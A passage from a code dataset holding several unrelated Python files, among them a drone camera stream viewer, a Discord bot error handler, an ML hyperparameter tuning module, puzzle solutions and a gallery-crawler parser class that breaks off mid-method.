socket,os,struct\n\n#save image and visualize\nimport numpy as np\nimport cv2 \nimport binascii\nimport io \n# import Image\nfrom PIL import Image\n\ndeck_ip = None\ndeck_port = None\n\nclass ImgThread(threading.Thread):\n def __init__(self, callback):\n threading.Thread.__init__(self, daemon=True)\n self._callback = callback\n\n def run(self):\n print(\"Connecting to socket on {}:{}...\".format(deck_ip, deck_port))\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.connect((deck_ip, deck_port))\n print(\"Socket connected\")\n\n imgdata = None\n imgdata_complete = None\n timestamp = 0\n\n while(1):\n strng = client_socket.recv(512)\n\n # Look for start-of-frame and end-of-frame\n start_idx = strng.find(b\"\\xff\\xd8\")\n end_idx = strng.find(b\"\\xff\\xd9\")\n\n # Concatenate image data, once finished send it to the UI\n if start_idx >= 0:\n # append the end of the packet\n imgdata += strng[:start_idx]\n # save data of the entire image (without the footer)\n imgdata_complete = imgdata\n # append the beginning of the next image\n imgdata = strng[start_idx:]\n # search the footer inside the image and ignore it (Temporal fix)\n end_idx = imgdata_complete.find(b\"\\xff\\xd9\")\n if end_idx >= 0 and imgdata_complete:\n imgdata_complete = imgdata_complete[0:end_idx] + imgdata_complete[end_idx+2:]\n # append the footer string to the image\n imgdata_complete = imgdata_complete + (b\"\\xff\\xd9\")\n\n try: #show frame\n self._callback(imgdata_complete)\n except gi.repository.GLib.Error:\n print (\"image not shown\")\n pass\n\n else: # Continue receiving the image\n if imgdata==None:\n imgdata=strng\n else:\n imgdata += strng\n\n\n \n# UI for showing frames from AI-deck example\nclass FrameViewer(Gtk.Window):\n\n def __init__(self):\n super(FrameViewer, self).__init__()\n self.frame = None\n self.init_ui()\n self._start = None\n self.set_default_size(374, 294)\n\n def init_ui(self): \n self.override_background_color(Gtk.StateType.NORMAL, Gdk.RGBA(0, 0, 0, 1))\n self.set_border_width(20)\n self.set_title(\"Connecting...\")\n self.frame = Gtk.Image()\n f = Gtk.Fixed()\n f.put(self.frame, 10, 10)\n self.add(f)\n self.connect(\"destroy\", Gtk.main_quit)\n self._thread = ImgThread(self._showframe)\n self._thread.start()\n\n def _update_image(self, pix):\n self.frame.set_from_pixbuf(pix)\n\n def _showframe(self, imgdata):\n # Add FPS/img size to window title\n if (self._start != None):\n fps = 1 / (time.time() - self._start)\n GLib.idle_add(self.set_title, \"{:.1f} fps / {:.1f} kb\".format(fps, len(imgdata)/1000))\n self._start = time.time()\n img_loader = GdkPixbuf.PixbufLoader()\n\n # Try to decode JPEG from the data sent from the stream\n try:\n img_loader.write(imgdata)\n pix = img_loader.get_pixbuf()\n GLib.idle_add(self._update_image, pix)\n except gi.repository.GLib.Error:\n print(\"Could not set image!\")\n img_loader.close()\n\n# Args for setting IP/port of AI-deck. Default settings are for when\n# AI-deck is in AP mode.\nparser = argparse.ArgumentParser(description='Connect to AI-deck JPEG streamer example')\nparser.add_argument(\"-n\", default=\"192.168.4.1\", metavar=\"ip\", help=\"AI-deck IP\")\nparser.add_argument(\"-p\", type=int, default='5000', metavar=\"port\", help=\"AI-deck port\")\nargs = parser.parse_args()\n\ndeck_port = args.p\ndeck_ip = args.n\n\nfw = FrameViewer()\nfw.show_all()\nGtk.main()\n\n\n","repo_name":"pulp-platform/AI-deck-workshop","sub_path":"Hands-on/Session 4/GAP8/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"18997230208","text":"\"\"\"Discord cog for all Wavelink events\"\"\"\nimport logging as logger\n\nimport discord\nimport wavelink\nfrom discord.ext import commands\n\nfrom src.essentials.errors import MustBeSameChannel, NotConnectedToVoice\nfrom src.utils.responses import Responses\n\n\nclass ErrorHandler(commands.Cog):\n \"\"\"\n Cog that triggers on error events.\n \"\"\"\n\n def __init__(self, bot: commands.Bot) -> None:\n self.bot = bot\n bot.tree.on_error = self.on_app_command_error\n self.responses = Responses()\n\n async def on_app_command_error(\n self,\n interaction: discord.Interaction,\n error: discord.app_commands.AppCommandError,\n ):\n \"\"\"Triggers when a error is raised.\"\"\"\n await interaction.response.defer()\n\n if isinstance(error, NotConnectedToVoice):\n return await interaction.followup.send(\n embed=await self.responses.user_not_in_vc()\n )\n if isinstance(error, MustBeSameChannel):\n player: wavelink.Player = wavelink.NodePool.get_node().get_player(\n interaction.guild.id\n )\n return await interaction.followup.send(\n embed=await self.responses.already_in_voicechannel(\n channel=player.channel\n )\n )\n\n\nasync def setup(bot):\n \"\"\"\n Setup for the cog.\n \"\"\"\n await bot.add_cog(ErrorHandler(bot))\n","repo_name":"Its-Haze/Dj-Braum-Music","sub_path":"src/cogs/error_handler.py","file_name":"error_handler.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"22653733755","text":"import json\nimport time\nimport warnings\nfrom datetime import timedelta\nimport math\nfrom os import makedirs\nfrom os.path import join as joinpath\n\nimport numpy as np\nfrom hyperopt import Trials, fmin, space_eval, tpe\nfrom hyperopt.mongoexp import MongoTrials\nfrom sklearn.exceptions import ConvergenceWarning\nfrom sklearn.model_selection import GroupKFold, KFold, StratifiedKFold\nfrom sklearn.utils import shuffle\n\nfrom config import K_FOLD_K_VALUE, RANDOM_STATE, RESULTS_DIR\nfrom utils import compute_loss, compute_metric\nfrom .timeout import set_timeout, TimeoutError\n\n\ndef tune_all_models_on_all_datasets(\n task_type,\n datasets,\n models,\n tuning_trials_per_step=5,\n max_tuning_time=120,\n max_trials_without_improvement=150,\n tuning_step_max_time=60,\n mongo_address=None,\n):\n warnings.filterwarnings(\"ignore\", category=ConvergenceWarning)\n\n minimum_runtime = max_tuning_time * len(models) * len(datasets)\n print(f\"Expected minimum runtime: {timedelta(seconds=minimum_runtime)}\")\n\n for dataset in datasets:\n print(f\"Dataset: {dataset.__name__}\")\n train, test = dataset.get()\n for model in models:\n print(f\"Model: {model.__name__}\")\n try:\n train_data, _ = model.prepare_dataset(\n train, test, dataset.categorical_features\n )\n\n tune_hyperparams(\n task_type,\n dataset,\n model,\n train_data,\n tuning_trials_per_step,\n max_tuning_time,\n max_trials_without_improvement,\n tuning_step_max_time,\n mongo_address,\n )\n except MemoryError:\n print(\n \"Memory requirements for this model with this dataset are too high\"\n )\n\n\ndef tune_hyperparams(\n task_type,\n dataset,\n model,\n train_data,\n tuning_step_size,\n max_tuning_time,\n max_trials_wo_improvement,\n tuning_step_max_time,\n mongo_address,\n):\n kfold, train_data = create_kfold(task_type, dataset, train_data)\n objective_fct = create_tuning_objective(dataset, model, train_data, kfold)\n\n # No tuning for models without hyper-parameters\n is_model_tunable = hasattr(model, \"hp_space\")\n if not is_model_tunable:\n loss = objective_fct(None)\n print(f\"Resulting {dataset.metric}: {-loss}\")\n return\n\n if tuning_step_max_time > 0:\n make_tuning_step_w_timeout = set_timeout(make_tuning_step, tuning_step_max_time)\n else:\n make_tuning_step_w_timeout = make_tuning_step\n\n # Tuning loop\n if mongo_address is not None:\n trials = MongoTrials(\n mongo_address, exp_key=f\"{dataset.__name__}-{model.__name__}\"\n )\n else:\n trials = Trials()\n start_time = time.time()\n rstate = np.random.RandomState(RANDOM_STATE)\n n_trials_wo_improvement = 0\n time_left = True\n while time_left and n_trials_wo_improvement < max_trials_wo_improvement:\n try:\n make_tuning_step_w_timeout(\n objective_fct, model.hp_space, trials, rstate, tuning_step_size\n )\n except TimeoutError:\n pass\n n_trials_wo_improvement = update_n_trials_wo_improvement(trials)\n time_left = (time.time() - start_time) < max_tuning_time\n tuning_time = time.time() - start_time\n\n process_tuning_result(trials, tuning_time, model, dataset)\n\n\ndef update_n_trials_wo_improvement(trials):\n if len(trials.trials) == 0:\n return 0\n best_trial = min(\n trials.trials,\n key=lambda r: r[\"result\"][\"loss\"]\n if r[\"result\"][\"status\"] == \"ok\"\n else math.inf,\n )\n best_trial_index = sorted(t[\"tid\"] for t in trials.trials).index(best_trial[\"tid\"])\n\n return len(trials.trials) - best_trial_index\n\n\ndef process_tuning_result(trials, tuning_time, model, dataset):\n n_sucessful_trials = len(\n [None for t in trials.trials if t[\"result\"][\"status\"] == \"ok\"]\n )\n if n_sucessful_trials == 0:\n print(\"No trials finished within allowed time\")\n return\n\n tuning_results_dir = joinpath(RESULTS_DIR, dataset.__name__, model.__name__)\n\n best_trial = min(\n trials.trials,\n key=lambda r: r[\"result\"][\"loss\"]\n if r[\"result\"][\"status\"] == \"ok\"\n else math.inf,\n )\n best_trial_index = sorted(t[\"tid\"] for t in trials.trials).index(best_trial[\"tid\"])\n best_loss = best_trial[\"result\"][\"loss\"]\n best_hp_raw = {\n k: v[0] if len(v) else None for k, v in best_trial[\"misc\"][\"vals\"].items()\n }\n best_hp = space_eval(model.hp_space, best_hp_raw)\n\n best_score = -best_loss if dataset.is_metric_maximized else best_loss\n\n save_tuning_results(\n tuning_results_dir,\n best_hp,\n best_score,\n best_trial_index,\n tuning_time,\n dataset.is_metric_maximized,\n )\n\n print(f\"Best {dataset.metric}: {best_score:.2f}\")\n print(f\"With hyperparams: \\n{best_hp}\")\n print(f\"Obtained after {best_trial_index} trials\")\n print(f\"Total number of sucessful trials: {n_sucessful_trials}\")\n print(f\"Total tuning time: {tuning_time:.1f}s\")\n\n\ndef make_tuning_step(objective_fct, hp_space, trials, rstate, step_size):\n fmin(\n objective_fct,\n hp_space,\n algo=tpe.suggest,\n max_evals=len(trials.trials) + step_size,\n trials=trials,\n show_progressbar=True,\n rstate=rstate,\n )\n\n\ndef create_tuning_objective(dataset, model, train, kfold):\n def objective(args):\n try:\n estimator = model.build_estimator(args, train)\n metric_values = []\n X, y, *_ = train\n for train_index, val_index in kfold.split(*train):\n X_train, X_val = X[train_index], X[val_index]\n y_train, y_val = y[train_index], y[val_index]\n\n estimator.fit(X_train, y_train)\n metric_value = compute_metric(\n y_val, estimator.predict(X_val), dataset.metric\n )\n metric_values.append(metric_value)\n if not getattr(dataset, \"needs_k_fold\", True):\n break\n\n return compute_loss(dataset.metric, metric_values)\n except ValueError:\n \"\"\" With some hyper-parameters combinations, a ValueError can be raised during training\n (in particular MLPRegressor)\n \"\"\"\n return {\"status\": \"fail\"}\n\n return objective\n\n\ndef create_kfold(task_type, dataset, train_data):\n if task_type == \"classification\":\n n_splits = min(K_FOLD_K_VALUE, dataset.get_min_k_fold_k_value(train_data))\n kfold = StratifiedKFold(n_splits, shuffle=True, random_state=RANDOM_STATE)\n elif task_type == \"regression\":\n if getattr(dataset, \"need_grouped_split\", False):\n train_data = shuffle(*train_data, random_state=RANDOM_STATE)\n kfold = GroupKFold(n_splits=K_FOLD_K_VALUE)\n else:\n kfold = KFold(\n n_splits=K_FOLD_K_VALUE, shuffle=True, random_state=RANDOM_STATE\n )\n return kfold, train_data\n\n\ndef save_tuning_results(\n tuning_results_dir, hyperparams, score, n_trials, tuning_time, is_metric_maximized\n):\n makedirs(tuning_results_dir, exist_ok=True)\n\n try:\n with open(\n joinpath(tuning_results_dir, \"tuning.json\"), \"r\", encoding=\"utf-8\"\n ) as file:\n prev_results = json.load(file)\n if is_metric_maximized:\n better_results = score > prev_results[\"score\"]\n else:\n better_results = score < prev_results[\"score\"]\n except FileNotFoundError:\n better_results = True\n\n if better_results:\n results = {\n \"hp\": hyperparams,\n \"score\": score,\n \"n_trials\": int(n_trials),\n \"tuning_time\": tuning_time,\n }\n with open(\n joinpath(tuning_results_dir, \"tuning.json\"), \"w\", encoding=\"utf-8\"\n ) as file:\n json.dump(results, file, ensure_ascii=False, indent=4)\n","repo_name":"hantoine/ml-algorithms-benchmark","sub_path":"utils/tuning.py","file_name":"tuning.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41900874653","text":"from typing import Optional, Tuple\n\ninp: str = open('2022/inputs/d2.txt').read()\nrounds = [i.split() for i in inp.split('\\n')]\n\nmoves = {'X': 1, 'Y': 2, 'Z': 3,}\noutcome = {True: 6, None: 3, False: 0,}\n\n# Part 1\n\ndef get_outcome(opp: str, me: str) -> Optional[bool]:\n if 'ABC'.index(opp) == 'XYZ'.index(me): \n status = None\n elif ('ABC'.index(opp) + 1) == 'XYZ'.index(me) or ((opp, me) == ('C', 'X')):\n status = True\n elif ('ABC'.index(opp) - 1) == 'XYZ'.index(me) or ((opp, me) == ('A', 'Z')):\n status = False\n return status # type: ignore\n\nprint(sum((moves.get(me) + outcome.get(get_outcome(opp, me))) for opp, me in rounds))\n\n# Part 2\n\nwins = {'A': 'Y', 'B': 'Z', 'C': 'X',}\nlose = {'A': 'Z', 'B': 'X', 'C': 'Y',}\n\ndef get_move(opp: str, end: str) -> Tuple[str, Optional[bool]]: # type: ignore\n result = {'X': False, 'Y': None, 'Z': True}\n end: Optional[bool] = result.get(end)\n\n if end is None: # draw\n move = list(moves.keys())['ABC'.index(opp)]\n elif end is True: # win\n move = wins[opp]\n elif end is False: # lose\n move = lose[opp]\n return (move, end)\n\nprint(sum((moves.get(get_move(opp, end)[0]) + outcome.get(get_move(opp, end)[1])) for opp, end in rounds))\n","repo_name":"rperson1508/advent-of-code","sub_path":"2022/solutions/d2.py","file_name":"d2.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43922697415","text":"import csv\r\n\r\nd1 = []\r\nd2 = []\r\nwith open(\"bright_stars.csv\",\"r\")as f:\r\n csvreader=csv.reader(f)\r\n for row in csvreader:\r\n d1.append(row)\r\n\r\nwith open(\"dwarf_stars.csv\",\"r\")as f:\r\n csvreader=csv.reader(f)\r\n for row in csvreader:\r\n d2.append(row)\r\n\r\nh1 = d1[0]\r\nstar_d1 = d1[1:]\r\nh2 = d2[0]\r\nstar_d2 = d2[1:]\r\n\r\nh = h1+h2\r\n\r\nstar_d =[]\r\n\r\nfor index,datarow in enumerate(star_d1):\r\n star_d.append(star_d1[index]+star_d2[index])\r\n\r\nwith open(\"final2.csv\",\"a+\")as f:\r\n csvwriter=csv.writer(f)\r\n csvwriter.writerow(h)\r\n csvwriter.writerows(star_d) ","repo_name":"Sonakshi-Pan/merging","sub_path":"dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16597190688","text":"class Security:\n def __init__(self, abnormal_security_definition: str):\n self.security_definition = abnormal_security_definition.replace(\" \", \"\")\n self.security_dict = {}\n if self.security_definition is not None:\n for permitted_command_users in self.security_definition.split(\";\"):\n permitted_users = permitted_command_users.split(\",\")\n self.security_dict[permitted_users[0]] = permitted_users[1:]\n\n def isPermitted(self, command, user_id):\n if command not in self.security_dict:\n return True\n permitted_users = self.security_dict[command]\n if user_id in permitted_users:\n return True\n return False\n\n\n\n","repo_name":"HaIiax/battery-staple","sub_path":"command_security.py","file_name":"command_security.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20340277109","text":"# Node rule\n\ndef maxnode(shape):\n return max(max(a,b) for (a,b) in shape)\n\ndef findCurrentEquivalences(shape):\n outlist=[]\n for node in range(maxnode(shape)+1):\n currentsIn = [pos for (pos,(a,b)) in enumerate(shape) if a==node]\n currentsOut = [pos for (pos,(a,b)) in enumerate(shape) if b==node]\n \n currentsInCopy= currentsIn\n \n currentsIn = [x for x in currentsIn if x not in currentsOut]\n currentsOut = [x for x in currentsOut if x not in currentsInCopy]\n \n outlist.append((node,currentsIn,currentsOut))\n return outlist\n\ndef nodeToEquation(inlist,outlist,length):\n def assign(x):\n if x in inlist:\n return 1.0\n elif x in outlist:\n return -1.0\n else:\n return 0.0\n return [assign(x) for x in range(length)]\n\n","repo_name":"bshlgrs/circuit-solver","sub_path":"nodeRule.py","file_name":"nodeRule.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15861475690","text":"#! /usr/bin/env python\n\nimport sys\nimport random\nimport collections\n\nrng = random.Random()\n\nv1 = [rng.randint(1, 100) for i in range( rng.randint(100, 200) ) ]\nv2 = [rng.randint(1, 100) for i in range( rng.randint(100, 200) ) ]\nc1 = collections.Counter(v1)\nc2 = collections.Counter(v2)\ncounted_matched = c1 & c2\nmatched = sorted(list(counted_matched.elements()))\ncounted_diffs = (c1 - c2) + (c2 - c1)\nunmatched = sorted(list(counted_diffs.elements()))\ndiff = len(unmatched)\n\nsys.stdout.write(\"{}\\n\".format(\" \".join([str(i) for i in v1])))\nsys.stdout.write(\"{}\\n\".format(\" \".join([str(i) for i in v2])))\nsys.stdout.write(\"{}\\n\".format(diff))\n","repo_name":"jeetsukumaran/pstrudel","sub_path":"test/scripts/calc-multiset-symmetric-difference.py","file_name":"calc-multiset-symmetric-difference.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17396335889","text":"import copy\nimport json\nimport typing\nfrom datetime import datetime, timezone\nimport time\nfrom typing import Optional\n\nimport django.utils.timezone as django_tz\nimport logging\n\nimport traceback\n\nfrom collections import defaultdict\nfrom collections.abc import Callable, Iterable\n\nfrom django.db import close_old_connections\nfrom django.db.models import QuerySet, Q, Value, CharField, F\nfrom django.db.models.functions import Concat, Replace\n\nfrom core.base import utilities\nfrom core.base.utilities import send_pushover_notification, chunks\nfrom core.base.types import GalleryData\nfrom viewer.signals import wanted_gallery_found\n\nif typing.TYPE_CHECKING:\n from core.downloaders.handlers import BaseDownloader\n from core.base.setup import Settings\n from viewer.models import Gallery, WantedGallery, Archive\n\nlogger = logging.getLogger(__name__)\n\n\ndef aggregate_wanted_time_taken(func):\n def wrapper_save_time_taken(*args, **kwargs):\n start = time.perf_counter()\n func(*args, **kwargs)\n end = time.perf_counter()\n args[0].time_taken_wanted += end - start\n\n return wrapper_save_time_taken\n\n\nclass BaseParser:\n name = ''\n ignore = False\n accepted_urls: list[str] = []\n empty_list: list[str] = []\n\n __SKIP_WAIT_TIME_DOWNLOADER_TYPES = ('info', 'submit')\n\n def __init__(self, settings: 'Settings') -> None:\n self.settings = settings\n if self.name in settings.providers:\n self.own_settings = settings.providers[self.name]\n else:\n self.own_settings = None\n self.general_utils = utilities.GeneralUtils(self.settings)\n self.downloaders: list[tuple['BaseDownloader', int]] = self.settings.provider_context.get_downloaders(self.settings, self.general_utils, filter_name=self.name)\n self.last_used_downloader: Optional['BaseDownloader'] = None\n self.time_taken_wanted: float = 0\n self.archive_callback: Optional[Callable[[Optional['Archive'], Optional[str], str], None]] = None\n self.gallery_callback: Optional[Callable[[Optional['Gallery'], Optional[str], str], None]] = None\n\n # We need this dispatcher because some provider have multiple ways of getting data (single, multiple),\n # or some have priorities (json fetch, crawl gallery page).\n # Each provider should set in this method how it needs to call everything, and could even check against a setting\n # to decide (cookie is set, page is available, etc).\n # It should at least check for str (URL) and list (list of URLs).\n def fetch_gallery_data(self, url: str) -> Optional[GalleryData]:\n return None\n\n def fetch_multiple_gallery_data(self, url_list: list[str]) -> Optional[list[GalleryData]]:\n return None\n\n def filter_accepted_urls(self, urls: Iterable[str]) -> list[str]:\n return [x for x in urls if any(word in x for word in self.accepted_urls)]\n\n # The idea here is: if it failed and 'retry_failed is not set, don't process\n # If it has at least 1 archive, to force redownload, 'redownload' must be set\n # If it has no archives, to force processing, 'replace_metadata' must be set\n # Skipped galleries are not processed again.\n # We don't log directly here because some methods would spam otherwise (feed crawling)\n def discard_gallery_by_internal_checks(self, gallery_id: Optional[str] = None, link: str = '', gallery: Optional['Gallery'] = None) -> tuple[bool, str]:\n\n if self.settings.update_metadata_mode:\n return False, 'Gallery link {ext_link} running in update metadata mode, processing.'.format(\n ext_link=link,\n )\n if not gallery and (gallery_id and self.settings.gallery_model):\n gallery = self.settings.gallery_model.objects.filter_first(gid=gallery_id, provider=self.name)\n if not gallery:\n return False, 'Gallery link {ext_link} has not been added, processing.'.format(\n ext_link=link,\n )\n\n if gallery.is_submitted():\n message = 'Gallery {title}, {ext_link} marked as submitted: {link}, reprocessing.'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return False, message\n\n if not self.settings.retry_failed and ('failed' in gallery.dl_type):\n message = 'Gallery {title}, {ext_link} failed in previous ' \\\n 'run: {link}, skipping (setting: retry_failed).'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return True, message\n\n if gallery.archive_set.all() and not self.settings.redownload:\n message = 'Gallery {title}, {ext_link} already added, dl_type: {dl_type} ' \\\n 'and has at least 1 archive: {link}, skipping (setting: redownload).'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n dl_type=gallery.dl_type\n )\n return True, message\n\n if not gallery.archive_set.all() and not self.settings.replace_metadata:\n message = 'Gallery {title}, {ext_link} already added: {link}, skipping (setting: replace_metadata).'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return True, message\n\n if 'skipped' in gallery.dl_type:\n message = 'Gallery {title}, {ext_link} marked as skipped: {link}, skipping.'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return True, message\n\n if gallery.is_deleted():\n message = 'Gallery {title}, {ext_link} marked as deleted: {link}, skipping.'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return True, message\n\n message = 'Gallery {title}, {ext_link} already added, but was not discarded: {link}, processing.'.format(\n ext_link=gallery.get_link(),\n link=gallery.get_absolute_url(),\n title=gallery.title,\n )\n return False, message\n\n # Priorities are: title, tags then file count.\n @aggregate_wanted_time_taken\n def compare_gallery_with_wanted_filters(self, gallery: GalleryData, link: str, wanted_filters: QuerySet, gallery_wanted_lists: dict[str, list['WantedGallery']]) -> None:\n\n if not self.settings.found_gallery_model:\n logger.error(\"FoundGallery model has not been initiated.\")\n return\n\n if not self.settings.wanted_gallery_model:\n logger.error(\"WantedGallery model has not been initiated.\")\n return\n\n if gallery.title or gallery.title_jpn:\n q_objects = Q()\n q_objects_unwanted = Q()\n q_objects_regexp = Q()\n q_objects_regexp_icase = Q()\n q_objects_unwanted_regexp = Q()\n q_objects_unwanted_regexp_icase = Q()\n if gallery.title:\n wanted_filters = wanted_filters.annotate(g_title=Value(gallery.title, output_field=CharField()))\n\n q_objects.add(Q(g_title__ss=Concat(Value('%'), Replace(F('search_title'), Value(' '), Value('%')), Value('%'))), Q.OR)\n q_objects_unwanted.add(~Q(g_title__ss=Concat(Value('%'), Replace(F('unwanted_title'), Value(' '), Value('%')), Value('%'))), Q.AND)\n\n q_objects_regexp.add(Q(g_title__regex=F('search_title')), Q.OR)\n q_objects_regexp_icase.add(Q(g_title__iregex=F('search_title')), Q.OR)\n q_objects_unwanted_regexp.add(~Q(g_title__regex=F('unwanted_title')), Q.AND)\n q_objects_unwanted_regexp_icase.add(~Q(g_title__iregex=F('unwanted_title')), Q.AND)\n\n if gallery.title_jpn:\n wanted_filters = wanted_filters.annotate(g_title_jpn=Value(gallery.title_jpn, output_field=CharField()))\n q_objects.add(Q(g_title_jpn__ss=Concat(Value('%'), Replace(F('search_title'), Value(' '), Value('%')), Value('%'))), Q.OR)\n q_objects_unwanted.add(~Q(g_title_jpn__ss=Concat(Value('%'), Replace(F('unwanted_title'), Value(' '), Value('%')), Value('%'))), Q.AND)\n\n q_objects_regexp.add(Q(g_title_jpn__regex=F('search_title')), Q.OR)\n q_objects_regexp_icase.add(Q(g_title_jpn__iregex=F('search_title')), Q.OR)\n q_objects_unwanted_regexp.add(~Q(g_title_jpn__regex=F('unwanted_title')), Q.AND)\n q_objects_unwanted_regexp_icase.add(~Q(g_title_jpn__iregex=F('unwanted_title')), Q.AND)\n\n filtered_wanted: QuerySet[WantedGallery] = wanted_filters.filter(\n Q(search_title__isnull=True)\n | Q(search_title='')\n | Q(Q(regexp_search_title=False), q_objects)\n | Q(Q(regexp_search_title=True, regexp_search_title_icase=False), q_objects_regexp)\n | Q(Q(regexp_search_title=True, regexp_search_title_icase=True), q_objects_regexp_icase)\n ).filter(\n Q(unwanted_title__isnull=True)\n | Q(unwanted_title='')\n | Q(Q(regexp_unwanted_title=False), q_objects_unwanted)\n | Q(Q(regexp_unwanted_title=True, regexp_unwanted_title_icase=False), q_objects_unwanted_regexp)\n | Q(Q(regexp_unwanted_title=True, regexp_unwanted_title_icase=True), q_objects_unwanted_regexp_icase)\n )\n\n else:\n filtered_wanted = wanted_filters.filter(\n Q(search_title__isnull=True) | Q(search_title='')\n ).filter(\n Q(unwanted_title__isnull=True) | Q(unwanted_title='')\n )\n\n if gallery.posted:\n filtered_wanted = filtered_wanted.filter(\n Q(wait_for_time__isnull=True) | Q(wait_for_time__lte=django_tz.now() - gallery.posted)\n )\n\n filtered_wanted = filtered_wanted.prefetch_related(\n 'wanted_providers',\n 'unwanted_providers',\n 'wanted_tags',\n 'unwanted_tags'\n )\n\n already_founds = self.settings.found_gallery_model.objects.filter(\n wanted_gallery__in=filtered_wanted,\n gallery__gid=gallery.gid,\n gallery__provider=self.name\n ).select_related(\n 'gallery',\n 'wanted_gallery'\n )\n\n for wanted_filter in filtered_wanted:\n # Skip wanted_filter that's already found.\n already_found = [x for x in already_founds if x.wanted_gallery.id == wanted_filter.id]\n # Skip already found unless it's a submitted gallery.\n if already_found and not already_found[0].gallery.is_submitted():\n continue\n # Skip wanted_filter that's not a global filter or is not for this provider.\n if wanted_filter.wanted_providers.count():\n if not wanted_filter.wanted_providers.filter(slug=self.name).first():\n continue\n if wanted_filter.unwanted_providers.count():\n if wanted_filter.unwanted_providers.filter(slug=self.name).first():\n continue\n accepted = True\n if bool(wanted_filter.wanted_tags.all()):\n if not set(wanted_filter.wanted_tags_list()).issubset(set(gallery.tags)):\n accepted = False\n # Review based on 'accept if none' scope.\n if not accepted and wanted_filter.wanted_tags_accept_if_none_scope:\n missing_tags = set(wanted_filter.wanted_tags_list()).difference(set(gallery.tags))\n # If all the missing tags start with the parameter,\n # and no other tag is in gallery with this parameter, mark as accepted\n scope_formatted = wanted_filter.wanted_tags_accept_if_none_scope + \":\"\n if all(x.startswith(scope_formatted) for x in missing_tags)\\\n and not any(x.startswith(scope_formatted) for x in gallery.tags):\n accepted = True\n # Do not accept galleries that have more than 1 tag in the same wanted tag scope.\n if accepted & wanted_filter.wanted_tags_exclusive_scope:\n accepted_tags = set(wanted_filter.wanted_tags_list()).intersection(set(gallery.tags))\n gallery_tags_scopes = [x.split(\":\", maxsplit=1)[0] for x in gallery.tags if len(x) > 1]\n wanted_gallery_tags_scopes = [x.split(\":\", maxsplit=1)[0] for x in accepted_tags if len(x) > 1]\n scope_count: dict[str, int] = defaultdict(int)\n for scope_name in gallery_tags_scopes:\n if scope_name in wanted_gallery_tags_scopes:\n if wanted_filter.exclusive_scope_name:\n if wanted_filter.exclusive_scope_name == scope_name:\n scope_count[scope_name] += 1\n else:\n scope_count[scope_name] += 1\n for scope, count in scope_count.items():\n if count > 1:\n accepted = False\n if not accepted:\n continue\n\n if not accepted:\n continue\n\n if bool(wanted_filter.unwanted_tags.all()):\n if any(item in gallery.tags for item in wanted_filter.unwanted_tags_list()):\n continue\n if wanted_filter.wanted_page_count_lower and gallery.filecount is not None and gallery.filecount:\n if not int(gallery.filecount) >= wanted_filter.wanted_page_count_lower:\n continue\n if wanted_filter.wanted_page_count_upper and gallery.filecount is not None and gallery.filecount:\n if not int(gallery.filecount) <= wanted_filter.wanted_page_count_upper:\n continue\n if wanted_filter.category and gallery.category is not None and gallery.category:\n if not (wanted_filter.category.lower() == gallery.category.lower()):\n continue\n\n gallery_wanted_lists[gallery.gid].append(wanted_filter)\n\n if len(gallery_wanted_lists[gallery.gid]) > 0:\n self.settings.wanted_gallery_model.objects.filter(id__in=[x.pk for x in gallery_wanted_lists[gallery.gid]]).update(\n found=True,\n date_found=django_tz.now()\n )\n\n logger.info(\"Gallery link: {}, title: {}, matched filters: {}.\".format(\n link,\n gallery.title,\n \", \".join([x.get_absolute_url() for x in gallery_wanted_lists[gallery.gid]])\n ))\n\n notify_wanted_filters = [\n \"({}, {})\".format((x.title or 'not set'), (x.reason or 'not set')) for x in\n gallery_wanted_lists[gallery.gid] if x.notify_when_found\n ]\n\n if notify_wanted_filters and self.settings.pushover.enable:\n\n message = \"Title: {}, link: {}\\nFilters title, reason: {}\".format(\n gallery.title,\n link,\n ', '.join(notify_wanted_filters)\n )\n\n send_pushover_notification(\n self.settings.pushover.user_key,\n self.settings.pushover.token,\n message,\n device=self.settings.pushover.device,\n sound=self.settings.pushover.sound,\n title=\"Wanted Gallery match found\"\n )\n return\n\n @staticmethod\n def id_from_url(url: str) -> Optional[str]:\n pass\n\n @staticmethod\n def token_from_url(url: str) -> Optional[str]:\n pass\n\n @classmethod\n def id_from_url_implemented(cls) -> bool:\n if cls.id_from_url is not BaseParser.id_from_url:\n return True\n return False\n\n def get_feed_urls(self) -> list[str]:\n return self.empty_list\n\n def crawl_feed(self, feed_url: str = '') -> list[typing.Any]:\n return self.empty_list\n\n def feed_urls_implemented(self) -> bool:\n if type(self).crawl_feed is not BaseParser.crawl_feed and type(self).get_feed_urls is not BaseParser.get_feed_urls:\n return True\n return False\n\n def crawl_urls_caller(\n self, urls: list[str],\n wanted_filters: Optional[QuerySet] = None, wanted_only: bool = False,\n preselected_wanted_matches: Optional[dict[str, list['WantedGallery']]] = None\n ):\n 